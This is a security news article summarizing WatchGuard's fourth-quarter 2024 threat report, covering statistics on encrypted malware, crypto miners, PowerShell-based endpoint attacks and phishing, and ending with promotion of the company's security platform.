The latest Internet Security Report from WatchGuard Technologies confirms what many experts have been warning: network-based malware is hiding behind encryption, and its volume has skyrocketed by 94% in just three months. The data, corresponding to the fourth quarter of 2024, reveals a troubling reality for businesses and users: cyberattacks are becoming increasingly sophisticated, stealthy, and difficult to detect.
WatchGuard, a global provider of unified cybersecurity solutions, details that the use of evasive techniques and encrypted traffic has become the norm among attackers. As encrypted channels proliferate for legitimate reasons, they are also solidifying as the preferred avenue to propagate zero-day malware, crypto miners, and stealthy attacks on endpoints.
Smarter Malware, More Complex Detections
Traditional protection is no longer sufficient. The report shows a 315% jump in detections using IntelligentAV, WatchGuard’s machine learning engine designed to identify unknown variants and emerging threats. There were also notable increases in the APT Blocker (+74%) and Gateway AntiVirus (+6%) engines, making it clear that attacks are successfully evading first lines of defense and require more proactive and adaptive technologies.
“The current landscape demands constant vigilance and layered defenses. It’s no longer enough to prevent; you have to anticipate,” warns Corey Nachreiner, Chief Security Officer at WatchGuard. “Attackers combine old techniques with encryption, artificial intelligence, and the exploitation of legitimate system tools. This convergence requires a new way of understanding cybersecurity.”
Crypto Miners: The Silent Threat Growing by 141%
One of the most alarming data points in the report is the 141% increase in detections of crypto miners. Although cryptocurrency mining is legitimate in many cases, its malicious use — hidden in foreign devices and without user consent — poses a growing threat, driven by the rise in value of cryptocurrencies like Bitcoin. This technique drains resources, reduces the performance of devices, and can go unnoticed for weeks or months.
PowerShell Dominates Endpoint Attacks
In the endpoint analysis, the use of LotL (Living off the Land) techniques continues to grow. These tactics rely on legitimate system tools to execute attacks without the need for external malware, making them harder to detect. The report highlights that 83% of endpoint attacks used scripts or injections, and of these, a staggering 97% were executed via PowerShell, solidifying it as one of the most exploited vectors of the year.
Less Volume, More Impact
Despite the increase in encrypted and sophisticated malware, the total volume of unique threats detected fell by 91%, which might seem positive; however, the report cautions against this: fewer threats do not mean less danger. Attackers are opting for more targeted campaigns and more complex tools that can cause greater damage with less exposure.
Meanwhile, network attacks decreased by 27%, but many of the detected threats continue to exploit known vulnerabilities. This reinforces a key message: patching remains essential, and many attacks continue to succeed because basic gaps remain open.
Persistent Phishing and Basic Yet Effective Attacks
The list of domains used in phishing campaigns has barely changed from the previous quarter, suggesting that well-positioned fraudulent infrastructures remain active and impactful. Many of these campaigns impersonate legitimate portals, especially SharePoint and Office 365, as part of Business Email Compromise (BEC) attacks.
Additionally, more than half of the top network detections corresponded to generic signatures that detect common vulnerabilities in web applications, signaling that attackers still rely on basic but massive strategies that seek to exploit known flaws with repetitive techniques.
Unified Cybersecurity, the Answer to a Changing Ecosystem
WatchGuard emphasizes the need for a unified approach. Its Unified Security Platform® is designed for managed service providers who need scalable, automated, and coordinated solutions. It combines network protection, advanced endpoint security, multifactor authentication, and secure Wi-Fi, all supported by shared intelligence and automation.
With over 250,000 customers worldwide and a network of more than 17,000 partners, the company underscores that collaboration and intelligence sharing are key to anticipating future threats.
Conclusion: Encryption is a Double-Edged Sword
Encryption protects privacy, but it also conceals increasingly aggressive threats. The takeaways from WatchGuard’s latest report are clear: attackers are adapting faster than ever, and the only way to keep pace is to combine advanced technology, shared intelligence, and a proactive, layered security strategy.
Source: Security News